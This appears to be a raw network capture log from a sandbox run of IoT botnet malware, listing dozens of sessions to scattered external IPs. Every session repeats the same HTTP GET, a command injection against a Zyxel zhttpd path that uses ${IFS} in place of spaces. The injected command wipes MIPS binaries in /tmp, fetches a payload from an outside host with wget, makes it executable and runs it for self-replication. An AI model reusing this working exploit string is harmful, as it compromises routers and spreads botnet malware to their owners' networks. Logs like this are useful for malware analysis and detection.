                                        Jan 14, 2024 16:19:00.846081018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8855192.168.2.1336706178.46.6.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846136093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8856192.168.2.135168248.122.191.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846172094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8857192.168.2.1343108216.143.14.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846200943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8858192.168.2.134548617.21.216.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846246958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8859192.168.2.1357840198.8.20.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846307993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8860192.168.2.133456671.68.249.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846335888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8861192.168.2.1355718145.208.181.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846376896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8862192.168.2.1356704216.136.131.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846402884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8863192.168.2.1359424119.19.57.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846432924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8864192.168.2.1342180158.168.248.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846502066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8865192.168.2.1345066118.100.204.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846529007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8866192.168.2.1346486176.157.6.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846566916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8867192.168.2.134312283.80.208.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846601009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8868192.168.2.134129899.19.174.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846657038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8869192.168.2.134920074.188.111.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846677065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8870192.168.2.13356022.195.71.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846685886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8871192.168.2.1341002180.213.82.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846755028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8872192.168.2.1349714130.107.197.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846791029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8873192.168.2.134137451.161.51.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846854925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8874192.168.2.1342650103.140.59.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846882105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8875192.168.2.1353810180.35.63.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846923113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8876192.168.2.1341574114.204.119.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846955061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8877192.168.2.133687027.236.157.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.846992970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8878192.168.2.1342890138.109.151.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847032070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8879192.168.2.134044674.96.226.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847089052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8880192.168.2.135424684.6.11.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847141981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8881192.168.2.134245680.130.13.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847187996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8882192.168.2.1354736174.18.196.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847239971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8883192.168.2.1340068189.32.159.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847278118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8884192.168.2.135224661.139.105.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847307920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8885192.168.2.133277018.236.246.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847357035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8886192.168.2.1358040171.79.127.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847417116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8887192.168.2.1353392136.141.210.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847455978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8888192.168.2.134091434.219.173.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847501993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8889192.168.2.1346682204.32.51.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847551107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8890192.168.2.1353710142.0.236.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847595930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8891192.168.2.1346172141.43.32.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847632885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8892192.168.2.1340368135.200.168.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847661018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8893192.168.2.134677894.71.189.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847691059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8894192.168.2.135675286.68.71.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847713947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8895192.168.2.1342880123.78.125.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847765923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8896192.168.2.1335040189.8.21.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847805977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8897192.168.2.1335236182.8.101.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847858906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8898192.168.2.136043432.189.125.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847901106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8899192.168.2.1339362149.96.37.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847927094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8900192.168.2.1360478113.225.228.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.847961903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8901192.168.2.1343976222.59.165.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848021030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8902192.168.2.135165449.32.83.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848063946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8903192.168.2.134721032.204.163.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848098040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8904192.168.2.135503617.110.40.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848109961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8905192.168.2.1349772193.92.127.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848151922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8906192.168.2.1333142101.116.252.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848206043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8907192.168.2.133652063.180.233.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848261118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8908192.168.2.13524461.107.86.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848303080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8909192.168.2.1343906163.205.130.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848321915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8910192.168.2.135038665.126.10.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848341942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8911192.168.2.135557899.250.197.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848402023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8912192.168.2.134039674.72.193.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848443985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8913192.168.2.1358636137.25.169.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848484039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8914192.168.2.1348548182.127.229.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848539114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8915192.168.2.1353794109.113.111.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848573923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8916192.168.2.134685677.214.85.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.848599911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8917192.168.2.1342330188.146.7.95443
                                        TimestampBytes transferredDirectionData
